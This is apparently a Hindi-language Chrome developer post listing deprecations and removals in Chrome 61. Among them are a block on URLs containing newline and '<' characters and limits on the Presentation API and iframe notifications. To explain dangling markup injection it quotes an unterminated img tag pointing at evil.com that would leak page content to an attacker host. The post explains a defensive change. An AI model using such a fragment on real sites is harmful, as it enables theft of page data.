Chrome के लगभग हर वर्शन में, हमें प्रॉडक्ट, उसकी परफ़ॉर्मेंस, और वेब प्लैटफ़ॉर्म की सुविधाओं में कई अपडेट और सुधार दिखते हैं. इस लेख में, Chrome 61 में बंद की गई सुविधाओं और हटाए गए एलिमेंट के बारे में बताया गया है. यह वर्शन 3 अगस्त तक बीटा वर्शन में उपलब्ध है. इस सूची में कभी भी बदलाव किया जा सकता है.
सुरक्षा और निजता
ऐसे रिसॉर्स को ब्लॉक करना जिनके यूआरएल में '\n' और '<' वर्ण शामिल हों
हैकिंग का एक टाइप डैंगलिंग मार्कअप इंजेक्शन है. इसमें, किसी बाहरी एंडपॉइंट पर डेटा भेजने के लिए, काटे गए यूआरएल का इस्तेमाल किया जाता है. उदाहरण के लिए,
<img src='https://evil.com/? वाले पेज पर विचार करें. यूआरएल में कोई क्लोज़िंग कोट नहीं है, इसलिए ब्राउज़र अगले कोट तक पढ़ेंगे और कोट में मौजूद वर्णों को एक यूआरएल के तौर पर इस्तेमाल करेंगे.
Chrome 61 में, href और src एट्रिब्यूट में इस्तेमाल किए जा सकने वाले वर्ण सेट पर पाबंदी लगाकर, इस जोखिम को कम किया गया है. खास तौर पर, Chrome यूआरएल को प्रोसेस करना तब बंद कर देगा, जब उसे नई लाइन के वर्ण (\n) और कम वर्ण (<) मिलेंगे.
जिन डेवलपर के पास यूआरएल में नई लाइन और कम वर्णों के इस्तेमाल का सही उदाहरण है उन्हें इन वर्णों को एस्केप करना चाहिए.
हटाने का इंटेंट | Chromestatus ट्रैकर | Chromium बग
असुरक्षित कॉन्टेक्स्ट में, Presentation API के इस्तेमाल पर रोक लगाना और उसे हटाना
हमें पता चला है कि असुरक्षित ऑरिजिन पर, Presentation API का इस्तेमाल हैकिंग वेक्टर के तौर पर किया जा सकता है. डिसप्ले में पता बार नहीं होते, इसलिए कॉन्टेंट को स्पूफ करने के लिए एपीआई का इस्तेमाल किया जा सकता है. चल रहे प्रज़ेंटेशन से भी डेटा निकाला जा सकता है.
Blink के असुरक्षित ऑरिजिन से काम करने वाली बेहतर सुविधाओं को हटाने के मकसद से, हम असुरक्षित कॉन्टेक्स्ट पर Presentation API के इस्तेमाल पर पाबंदी लगाने और उसे हटाने जा रहे हैं. Chrome 61 और उसके बाद के वर्शन में, PresentationRequest.start() असुरक्षित ऑरिजिन पर काम नहीं करेगा.
हटाने का इंटेंट | Chromestatus ट्रैकर | Chromium बग
JavaScript
Windows पर इंडेक्स की गई प्रॉपर्टी तय करने की अनुमति नहीं है
पहले कुछ ब्राउज़र, JavaScript के ऐसे असाइनमेंट की अनुमति देते थे:
window[0] = 1;
एचटीएमएल के मौजूदा स्पेसिफ़िकेशन में बताया गया है कि यह JavaScript के स्पेसिफ़िकेशन का साफ़ तौर पर उल्लंघन है. इसलिए, Chrome 61 में इस सुविधा को हटा दिया गया है. फ़रवरी 2016 से, Firefox इस कानून का पालन कर रहा है.
असुरक्षित iframe से सूचनाओं के इस्तेमाल को हटाना
iframe से अनुमति के अनुरोध, उपयोगकर्ताओं को भ्रमित कर सकते हैं. ऐसा इसलिए, क्योंकि पेज के ऑरिजिन और अनुरोध करने वाले iframe के ऑरिजिन के बीच अंतर करना मुश्किल होता है. जब अनुरोध का दायरा साफ़ तौर पर नहीं बताया जाता है, तो उपयोगकर्ताओं के लिए यह तय करना मुश्किल हो जाता है कि अनुमति दी जाए या नहीं.
iframes में सूचनाएं दिखाने की अनुमति नहीं देने से, सूचना की अनुमति की ज़रूरी शर्तों को पुश नोटिफ़िकेशन के साथ अलाइन किया जाएगा. इससे डेवलपर को आसानी होगी.
जिन डेवलपर को इस सुविधा की ज़रूरत है वे सूचना की अनुमति का अनुरोध करने के लिए, एक नई विंडो खोल सकते हैं.